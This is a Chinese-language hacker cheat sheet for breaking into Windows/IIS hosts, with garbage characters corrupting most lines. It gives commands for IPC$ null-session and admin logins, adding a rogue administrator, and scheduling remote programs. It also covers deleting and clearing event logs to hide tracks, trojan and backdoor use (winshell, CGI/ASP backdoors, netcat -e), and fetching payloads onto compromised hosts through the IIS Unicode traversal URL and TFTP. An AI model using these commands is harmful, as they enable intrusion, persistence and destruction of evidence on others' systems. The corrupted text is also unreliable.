网管和黑客都必须知道的命令
u#}�zNz#C5 常用的几条NET命令:
C0kw��I*)� �7Qq�>?H - (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
1FY��^_dvH Q Odv�zVy< (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
7�]
~�'�8� �N-vr_4{g (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
)~�!�Gs/w6 6�Lz&"C,` (查看远程主机时间) net time \\IP地址
G�L
�(YC-{ Yz{U�P)TC
(定时启动某个程序) at \\IP地址 02:18 readme.exe
�dy���u~T{ A�MtFOXx%I (查看共享) net view \\IP地址
"*T�nkFTR� ��HW{+THNj (查看netbios工作组列表) nbtstat -A IP地址
==|/�/:: \ GKm)wOb(*S (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
*jDzh;H!�w 9#pl BtQ** (这两条把自己增加到管理员组): net user 用户名 密码 /add
9��/�Q�5(P 'm�-s8]-�W net localgroup Administrators 用户名 /add
i�iO�4.@nT ��w'���U;b (断开连接) net use \\IP地址\ipc$ /delete
��QDSB
<0j �I�WKQU/l! 扫尾:
�~Edm�VEu�
N��)&3(A@ del C:\winnt\system32\logfiles\*.*
fq\E$��'o$ XB^z' P{-Y del C:\winnt\ssytem32\config\*.evt
o�STGs@EK �UJlK�w `4 del C:\winnt\system32\dtclog\*.*
B&�<Z#C:�I E�[���e '' del C:\winnt\system32\*.log
;Wb
W\�,P' _`�ot�||J� del C:\winnt\system32\*.txt
Hq#q4Y���� >��f70-D28 del C:\winnt\*.txt
aRy" _dZ�2 PF�jh�]/=� del C:\winnt\*.log
�+h@ZnFp3 f�LZ m��QO 一、netsvc.exe
.S[M:�<<*� &�Gs/#�2XQ 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
��Cs2k�bG_ @6b4�YV
h� netsvc /list \\IP地址
QY��c/f�"9 IO7�cRg'-F netsvc schedule \\IP地址 /query
{9�v���M�c iL���Q;`/j netsvc \\IP地址 schedule /start
`#4q7v~>oe pgBIY�eY,� 二、OpenTelnet.exe
�hWi2�S!*Y ,*8)aZ1�k 远程启动主机的Telnet服务,并绑定端口到7878,例如:
��UJ��><B" B]I*�ymc#� OpenTelnet \\IP地址 用户名 密码 1 7878
Mavi�d�kS
���AjJ/t4< 然后就可以telnet到主机的7878端口,进入DOS方式下:
m��F�t\xGa Y�m�D~�&J� telnet IP地址 7878
+�/ ?oyC+Z E�:�Ul�_m8 三、winshell.exe
;�@qQ�^!g2 duc\/���S' 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
p-�*�{�x�� Wr`<bLq1vs p Path (查看winshell主程序的路径信息)
;
�W$.>*O� ']N\y6=fn9 b reBoot (重新启动机器)
@(�IA:6�GN i�
^,
$/ d shutDown (关闭机器)
P��|�ftEF� -�@Z9h)G|� s Shell (执行后你就会看到可爱的“C:\>”)
H(kxRPH4@] {�LT2�^gy= x eXit (退出本次登录会话,此命令并不终止winshell的运行)
?�
M.�'YB2 ��uK0�L>�� CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
mR�$�0Ij/v �\H
�5t-w= 四、3389登陆器,GUI方式登录远程主机的
L �s+�z�J1 [L��rO"9q( 五、elsave.exe
(:R5"|]@<x y�5�X��FJj 事件日志清除工具
O&s�U�Pv }��{mS��"� elsave -s \\IP地址 -l "application" -C
G?!8T9�1;� pc�QgWjfS� elsave -s \\IP地址 -l "system" -C
\eAV�:� qV ^S 45!mSb elsave -s \\IP地址 -l "security" -C
l�;�@bs���
IFW7�MF9V 执行后成功清除应用程序日志,系统日志,安全日志
`�l %,�4qR fcy4?SQ.<i 六、hbulot.exe
5g�.K��yj| dj}|EW�4�� 开启win2kserver和winxp的3389服务
nZM��]E�Wn `aA)n;{/2u hbulot [/r]
^1<i�7���u =E-o�@#�BS 使用/r表示安装完成后自动重起目标使设置生效。
Cx�e(iwa.� C=��2DxdZG 七、nc.exe(netcat.exe)
7~;)N�$d�\ >�C�wI(vXn 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
ca5�;Z@t$S b1�G6'~U�- 想要连接到某处: nc [-options] hostname port[s] [ports] ...
$GHi�9aj_P �nz�F2Waa- 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
g�Sf��>�+| (Ffa{Tt�!� 参数:
;|W:,a{kS� _xBh�Mu2f -e prog 程序重定向,一旦连接,就执行 [危险!!]
[+�="�I
�& L[��<��CEk -g gateway source-routing hop point[s], up to 8
BqDsf5}jpA r�%NzKPW�' -G num source-routing pointer: 4, 8, 12, ...
Fc=6�*�.hy ���[
$�"� -h 帮助信息
d[nz0LI|mk /c�6]DQ<? -i secs 延时的间隔
�8VuL�L<\| j`K�0�D65� -l 监听模式,用于入站连接
?.n1�t@sG& B\qy�:nr j -n 指定数字的IP地址,不能用hostname
��m\E=I5*/ �P>�^$���X -o file 记录16进制的传输
jhBfy|Ftu� 3��,#v0��# -p port 本地端口号
�PWq�uu�`� ���P#��
U| -r 任意指定本地及远程端口
}SyK)W5��Y Lr(Jn����S -s addr 本地源地址
F8M};&=*1r Wg<o�%6`�� -u UDP模式
%(H'
�j@D[ C~'�.�3Q�6 -v 详细输出——用两个-v可得到更详细的内容
B~J63��Os/ `LKf$cx�(A -w secs timeout的时间
BB� ::�zBg g@pK9R%wH< -z 将输入输出关掉——用于扫描时
�}o\}� qu* 八、TFTPD32.EXE
;�7�Q�G]JX �G���({�VK 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
/�g�e�x0�w x}=Q)|�)]� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
[H�Q/MkP-Z �*y�$CDv�� 然后可以直接令文件运行:
�Vu�N#j�<H ~-u�D��N�) http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
f�u-,<m�{� %*V�r}@BA) 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
Hw6���2'�% 3II*NAN�eg 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
=.J��cIT'
fN�:FD�`�� 一、一 Xscan命令行运行参数说明:
Fq%NY8�KNE |CQ0{1R1�� 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
77wod}h!:� \'|�t>|zhp 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
Ku�L+��~� 7s;�;2<k;_ xscan -file <主机列表文件名> <检测项目> [其他选项]
B@ ms�Gb C a��Sg�K�h 其中<检测项目> 含义如下:
L�:Mjd�47L �}r;=<mc,O -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
��E]�S:F�3 q]*j�T���b -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
->�7z��VAX WMWUP ZsGS -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
nK���I?Sc Q
;5A�~n�� -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
)Hv�B��ceN yJ6g{#X4K< -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
3W�x\�Liw, eZ0-O� /_i [其他选项] 含义如下:
p� _3xW�{I x�uVc1jJH� -v: 显示详细扫描进度
<(�yAa�t$H 7�W�5C�m�\ -p: 跳过Ping不通的主机
5�g$>�J)Ry .������[3C -o: 跳过没有检测到开放端口的主机
��9�`? M-U ;d_<6�|*M -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
